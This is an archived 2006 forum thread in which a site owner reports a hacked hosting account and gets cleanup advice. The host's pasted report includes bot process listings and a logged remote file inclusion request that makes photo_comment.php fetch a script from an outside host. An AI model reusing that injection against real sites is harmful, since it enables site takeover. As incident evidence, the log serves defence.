PDA

View Full Version : hacked lunar page accnt

yosemite
8th of June 2006 (Thu), 10:49
i to have been hacked and my accnt at lunar pages is now suspended.

i have read all the posts on this and what is the best way to clean this up?

try to repair or do a fresh install?


lunar pages report:

yosem2 10282 0.0 0.0 2004 680 ? S Jun06 0:00 ./psybnc
yosem2 30938 0.0 0.0 2000 680 ? S Jun06 0:00 sendmail:
accepting connections

?
chanary
yosem2 21801 0.0 0.0 4272 2668 ? S Jun06 0:12 ./egg -m
Talstalob.txt
yosem2 22337 0.0 0.0 4152 2540 ? S Jun06 0:08 ./egg -m
MazgaioB.txt


Operating environment info:


SERVER_SIGNATURE=<ADDRESS>Apache/1.3.34 Server at www.yosemitestock.com (http://www.yosemitestock.com/) Port
80</ADDRESS>

HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90;
{E035BCE7-84C3-32A2-94D9-F7B564FA4510})
SERVER_PORT=80
HTTP_HOST=www.yosemitestock.com (http://www.yosemitestock.com/)
PHP_AUTH_USER=SetiawaN
DOCUMENT_ROOT=/home/yosem2/public_html
SCRIPT_FILENAME=/home/yosem2/public_html/ee/login.php
REQUEST_URI=/ee/login.php
SCRIPT_NAME=/ee/login.php
HTTP_CONNECTION=Keep-Alive
REMOTE_PORT=52434
PATH=/bin:/usr/bin
PWD=/home/yosem2/public_html/ee/.db
SERVER_ADMIN=webmaster@yosemitestock.com
REDIRECT_STATUS=200
PHP_AUTH_PW=030585
HTTP_ACCEPT_LANGUAGE=en-us
PATH_TRANSLATED=/home/yosem2/public_html/ee/login.php
HTTP_REFERER=http://www.yosemitestock.com/ee/login.php
HTTP_ACCEPT=image/gif (http://www.yosemitestock.com/ee/login.phpHTTP_ACCEPT=image/gif), image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/msword, application/x-shockwave-flash,
*/*
REMOTE_ADDR=222.124.160.18 (http://222.124.160.18/)
SHLVL=1
SERVER_NAME=www.yosemitestock.com (http://www.yosemitestock.com/)
CONTENT_LENGTH=128
SERVER_SOFTWARE=Apache Web Server
SERVER_ADDR=216.227.218.113 (http://216.227.218.113/)
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.1
HTTP_ACCEPT_ENCODING=gzip, deflate
CONTENT_TYPE=application/x-www-form-urlencoded
REQUEST_METHOD=POST
_=./psybnc


SERVER_SIGNATURE=<ADDRESS>Apache/1.3.34 Server at www.yosemitestock.com (http://www.yosemitestock.com/) Port
80</ADDRESS>

HTTP_KEEP_ALIVE=300
HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12)
Gecko/20050915 Firefox/1.0.7
HTTP_HOST=www.yosemitestock.com (http://www.yosemitestock.com/)
SERVER_PORT=80
DOCUMENT_ROOT=/home/yosem2/public_html
HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7
SCRIPT_FILENAME=/home/yosem2/public_html/ee/photo_comment.php
REQUEST_URI=/ee/photo_comment.php?solpotcrew=http://coffee-pot.info/injek.txt?
SCRIPT_NAME=/ee/photo_comment.php
HTTP_CONNECTION=keep-alive
REMOTE_PORT=61373
PATH=/bin:/usr/bin (http://coffee-pot.info/injek.txt?SCRIPT_NAME=/ee/photo_comment.phpHTTP_CONNECTION=keep-aliveREMOTE_PORT=61373PATH=/bin:/usr/bin)
_=./proc
SERVER_ADMIN=webmaster@yosemitestock.com
PWD=/home/yosem2/public_html/ee/.psy
REDIRECT_STATUS=200
HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5
HTTP_REFERER=http://www.yosemitestock.com/ee/photo_comment.php?solpotcrew=http://coffee-pot.info/injek.txt?
PATH_TRANSLATED=/home/yosem2/public_html/ee/photo_comment.php
HTTP_ACCEPT=text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
REMOTE_ADDR=85.114.250.107
SERVER_NAME=www.yosemitestock.com
SHLVL=2
CONTENT_LENGTH=71
SERVER_SOFTWARE=Apache (http://www.yosemitestock.com/ee/photo_comment.php?solpotcrew=http://coffee-pot.info/injek.txt?PATH_TRANSLATED=/home/yosem2/public_html/ee/photo_comment.phpHTTP_ACCEPT=text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5REMOTE_ADDR=85.114.250.107SERVER_NAME=www.y osemitestock.comSHLVL=2CONTENT_LENGTH=71SERVER_SOF TWARE=Apache) Web Server
QUERY_STRING=solpotcrew=http://coffee-pot.info/injek.txt?
SERVER_ADDR=216.227.218.113
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.1
HTTP_ACCEPT_ENCODING=gzip,deflate
CONTENT_TYPE=application/x-www-form-urlencoded
HTTP_COOKIE=hotlog=1
REQUEST_METHOD=POST (http://coffee-pot.info/injek.txt?SERVER_ADDR=216.227.218.113GATEWAY_INTER FACE=CGI/1.1SERVER_PROTOCOL=HTTP/1.1HTTP_ACCEPT_ENCODING=gzip,deflateCONTENT_TYPE=a pplication/x-www-form-urlencodedHTTP_COOKIE=hotlog=1REQUEST_METHOD=POST)

files in system /tmp

4 drwxrwxrwx 2 yosem2 yosem2 4096 Jun 5 05:43 ...
4 drwxrwxrwx 2 yosem2 yosem2 4096 Jun 5 05:43 .
24 -rw-r--r-- 1 yosem2 yosem2 20847 Apr 8 01:30 perlbot.txt
Pekka
8th of June 2006 (Thu), 12:14
Most secure solution: If you have backups of all (apps, photos, databases) from time before the attack, ask Lunarpages to reinstall (wipe) the who virtual server setup, and then you restore backups. Then change all your passwords and secret folder- and filenames.

Else, you need to clean /tmp (and all other temps), run e.g.http://www.rootkit.nl/ and cleanup manually. Change all your passwords and secret folder- and filenames.
yosemite
8th of June 2006 (Thu), 12:27
thanks pekka,

is your reply for a server you run yourself or a virtual server?

i just have a hosted accnt. i went in and deleted all the hacked files and folders, renamed photo_comment as that was hacked and there is now a login.php which i renamed.

they could not change the
register_globals = on
allow_url_fopen = on

so i put a php.ini file that turns those off in the root as they suggested. i am now waiting to see if they will reactivate my accnt.

do you think this will work?
Pekka
8th of June 2006 (Thu), 12:34
That sounds ok. If your virtual server is not a VPS or dedicated server, then file cleanup should do it. Still: change all ftp/shell passwords, change input folder name, and request another mysql password.

I think it is amazing that Lunarpages have register_globals = on for all servers by default. The whole admin community knows that that is about the worst setting you can make with php.ini these days.
yosemite
8th of June 2006 (Thu), 12:43
what about the photo_comment.php? is ok to not have this? and should there be a login.php in the root?

again than you and i will keep you posted.

cf
Pekka
8th of June 2006 (Thu), 12:49
No there is no login.php in EE root folder.
Get the files from http://photography-on-the.net/forum/showpost.php?p=1588164&postcount=3 and replace all of them. EE commerce templates might need editing (keep backups).
yosemite
8th of June 2006 (Thu), 15:36
i have done all the above suggestions and lunar reactivated my accnt but i know get the
internal server error.

i see someone else had this problem at:
http://photography-on-the.net/forum/showthread.php?t=177875&page=2&highlight=internal+server+error

does anyone know a fix?
MikeCaine
8th of June 2006 (Thu), 16:27
I just created a .htaccess file in /gallery with

php_flag register_globals off

as the sole contents and it plugged the hole for me
yosemite
9th of June 2006 (Fri), 14:12
well i tried everything but could never get ee to work again, i always got the internal server error. luckily they did a restore from backup for $75 and it seems to work.

perhaps a broadcast email to all members of this forum about big security problems like this would save some people next time.
MikeCaine
9th of June 2006 (Fri), 15:55
luckily they did a restore from backup for $75 and it seems to work.

Ouch - mine did it for free

perhaps a broadcast email to all members of this forum about big security problems like this would save some people next time.

Yes, I'd happily sign up to an hack alert mail list
Pekka
9th of June 2006 (Fri), 16:00
For EE 2.0 I will start gathering an EE news/alerts PM and email lists. Also, EE 2.0 will show on admin index page latest news and possible alerts and reminders (live from my server).